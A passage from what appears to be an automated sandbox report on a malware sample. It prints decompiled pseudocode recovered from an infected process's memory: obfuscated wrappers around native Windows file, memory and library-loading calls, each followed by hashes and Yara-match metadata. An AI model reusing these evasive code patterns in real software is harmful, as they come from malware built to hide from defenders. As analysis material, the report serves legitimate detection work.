                                                                                                                                                    				return _t21;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:A$b=A$b=A
                                                                                                                                                    • API String ID: 2738559852-704622139
                                                                                                                                                    • Opcode ID: d278293a72e928245ba5d1c4965b2a26c6673b4345e7bcde11c86906ea445a02
                                                                                                                                                    • Instruction ID: 88b1141c54382e50f69abbad5d8ada372f13132d47ed4204a516990edf475160
                                                                                                                                                    • Opcode Fuzzy Hash: d278293a72e928245ba5d1c4965b2a26c6673b4345e7bcde11c86906ea445a02
                                                                                                                                                    • Instruction Fuzzy Hash: FAF01DB2200049AFCB05DFA9D880CEB7BA9EF8C354B05874DF95D93205C634E855CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                    				char* _v8;
                                                                                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                    				char _v536;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                    				void* _t30;
                                                                                                                                                    				void* _t31;
                                                                                                                                                    				void* _t32;
                                                                                                                                                    
                                                                                                                                                    				_v8 =  &_v536;
                                                                                                                                                    				_t15 = E0041AB60( &_v12, 0x104, _a8);
                                                                                                                                                    				_t31 = _t30 + 0xc;
                                                                                                                                                    				if(_t15 != 0) {
                                                                                                                                                    					_t17 = E0041AF80(__eflags, _v8);
                                                                                                                                                    					_t32 = _t31 + 4;
                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push( &_v12);
                                                                                                                                                    						E0041B200( &_v12);
                                                                                                                                                    						_t32 = _t32 + 8;
                                                                                                                                                    					}
                                                                                                                                                    					_t18 = E00419310(_v8);
                                                                                                                                                    					_v16 = _t18;
                                                                                                                                                    					__eflags = _t18;
                                                                                                                                                    					if(_t18 == 0) {
                                                                                                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                    						return _v16;
                                                                                                                                                    					}
                                                                                                                                                    					return _t18;
                                                                                                                                                    				} else {
                                                                                                                                                    					return _t15;
                                                                                                                                                    				}
                                                                                                                                                    			}













                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                    			E0041842A(void* __ebx, long* __ecx, long __edx, void* __eflags, PVOID* _a4, intOrPtr _a8, void* _a12, PVOID* _a16, intOrPtr _a20) {
                                                                                                                                                    				void* _v117;
                                                                                                                                                    				intOrPtr* __esi;
                                                                                                                                                    				long _t14;
                                                                                                                                                    				long _t22;
                                                                                                                                                    
                                                                                                                                                    				asm("sahf");
                                                                                                                                                    				if(__eflags < 0) {
                                                                                                                                                    					 *(__ebx + 0x4d8b1c45) =  *(__ebx + 0x4d8b1c45) & __ecx;
                                                                                                                                                    					asm("sbb [ebx-0x74adeb3c], al");
                                                                                                                                                    					asm("adc al, 0x50");
                                                                                                                                                    					_t14 = NtAllocateVirtualMemory(_a12, _a16, __edx, __ecx, _t22, _t22); // executed
                                                                                                                                                    					return _t14;
                                                                                                                                                    				} else {
                                                                                                                                                    					 *__ecx =  *__ecx | __ch;
                                                                                                                                                    					__eflags = __dl;
                                                                                                                                                    					__ebp = __esp;
                                                                                                                                                    					__eax = _a4;
                                                                                                                                                    					__ecx =  *(__eax + 0x10);
                                                                                                                                                    					_t8 = __eax + 0xc68; // 0x10c68
                                                                                                                                                    					__esi = _t8;
                                                                                                                                                    					__eax = E00418DD0(__eax, __esi,  *(__eax + 0x10), 0, 0x32);
                                                                                                                                                    					__edx = _a20;
                                                                                                                                                    					__eax = _a16;
                                                                                                                                                    					__ecx = _a12;
                                                                                                                                                    					__edx = _a8;
                                                                                                                                                    					__eax =  *__esi;
                                                                                                                                                    					__eax =  *((intOrPtr*)( *__esi))(_a8, _a12, _a16, _a20, __esi, __ebp); // executed
                                                                                                                                                    					_pop(__esi);
                                                                                                                                                    					_pop(__ebp);
                                                                                                                                                    					return  *__esi;
                                                                                                                                                    				}
                                                                                                                                                    			}








                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 9fc4cd6a9699623b314f68c695e12314c795a0edb1f160f921a187c0ea5b8722
                                                                                                                                                    • Instruction ID: e5e07c23e0b61ecc6f6ba6514068d102416723df266f2d7411522f976c4483dc
                                                                                                                                                    • Opcode Fuzzy Hash: 9fc4cd6a9699623b314f68c695e12314c795a0edb1f160f921a187c0ea5b8722
                                                                                                                                                    • Instruction Fuzzy Hash: E10181B12042486FCB14CFA9DCC5DE77BACEF99650F14868DF9598B242C531E914CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                    				long _t21;
                                                                                                                                                    
                                                                                                                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                    				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                    				return _t21;
                                                                                                                                                    			}





                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E004181CB(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                    				long _t21;
                                                                                                                                                    
                                                                                                                                                    				asm("sbb [0x8bec8b55], ch");
                                                                                                                                                    				_t15 = _a4;
                                                                                                                                                    				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                    				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                    				return _t21;
                                                                                                                                                    			}





                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 20e92779011ac0e04daff7c233cce501c312b90211f4dc961b9a7cec4a8ac32c
                                                                                                                                                    • Instruction ID: 706bd3f36b3da54dd90dc2834f4bdaca83244fcf7e43a2b86b73b47cc0820688
                                                                                                                                                    • Opcode Fuzzy Hash: 20e92779011ac0e04daff7c233cce501c312b90211f4dc961b9a7cec4a8ac32c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0ECB6214148ABCB08CF99D884CEB77A9FF8C354B15964DF95D93201D634E855CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E004183AA(void* __ebx, signed int __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a28) {
                                                                                                                                                    				intOrPtr _v117;
                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                    				long _t17;
                                                                                                                                                    				long* _t19;
                                                                                                                                                    				long _t22;
                                                                                                                                                    				long _t29;
                                                                                                                                                    				long _t31;
                                                                                                                                                    
                                                                                                                                                    				_v117 = _v117 +  *(_t31 + __edi * 4 - 0x78) * 0xffffffca;
                                                                                                                                                    				_t29 = _t31;
                                                                                                                                                    				_t14 = _a4;
                                                                                                                                                    				_t19 =  *(_t14 + 0x10);
                                                                                                                                                    				_t8 = _t14 + 0xc60; // 0xca0
                                                                                                                                                    				E00418DD0(_t14, _t8, _t19, 0, 0x30);
                                                                                                                                                    				_t22 = _a28;
                                                                                                                                                    				 *(__ebx + 0x4d8b1c45) =  *(__ebx + 0x4d8b1c45) & _t19;
                                                                                                                                                    				asm("sbb [ebx-0x74adeb3c], al");
                                                                                                                                                    				asm("adc al, 0x50");
                                                                                                                                                    				_t17 = NtAllocateVirtualMemory(_a8, _a12, _t22, _t19, _t29, _t29); // executed
                                                                                                                                                    				return _t17;
                                                                                                                                                    			}











                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 11195c9e95143480f7653253d9b29615d8e43e3f047449858d110e97f9bcb2bc
                                                                                                                                                    • Instruction ID: 1c7ba49dd148709324ea57caa2532edf34092887b1d5dc0183576e7391f031c4
                                                                                                                                                    • Opcode Fuzzy Hash: 11195c9e95143480f7653253d9b29615d8e43e3f047449858d110e97f9bcb2bc
                                                                                                                                                    • Instruction Fuzzy Hash: 5AF05EB2204208AFCB14DF99DC81EEB77A9AF98340F15864DF90997291C630E810CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E004183B0(void* __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a28) {
                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                    				long _t12;
                                                                                                                                                    				long* _t14;
                                                                                                                                                    				long _t16;
                                                                                                                                                    				long _t19;
                                                                                                                                                    
                                                                                                                                                    				_t9 = _a4;
                                                                                                                                                    				_t14 =  *(_t9 + 0x10);
                                                                                                                                                    				_t3 = _t9 + 0xc60; // 0xca0
                                                                                                                                                    				E00418DD0(_t9, _t3, _t14, 0, 0x30);
                                                                                                                                                    				_t16 = _a28;
                                                                                                                                                    				 *(__ebx + 0x4d8b1c45) =  *(__ebx + 0x4d8b1c45) & _t14;
                                                                                                                                                    				asm("sbb [ebx-0x74adeb3c], al");
                                                                                                                                                    				asm("adc al, 0x50");
                                                                                                                                                    				_t12 = NtAllocateVirtualMemory(_a8, _a12, _t16, _t14, _t19, _t19); // executed
                                                                                                                                                    				return _t12;
                                                                                                                                                    			}









                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418300(intOrPtr _a4, void* _a8) {
                                                                                                                                                    				long _t8;
                                                                                                                                                    
                                                                                                                                                    				_t5 = _a4;
                                                                                                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                    				_t3 = _t5 + 0xc50; // 0x409753
                                                                                                                                                    				E00418DD0(_a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                    				_t8 = NtClose(_a8); // executed
                                                                                                                                                    				return _t8;
                                                                                                                                                    			}





                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
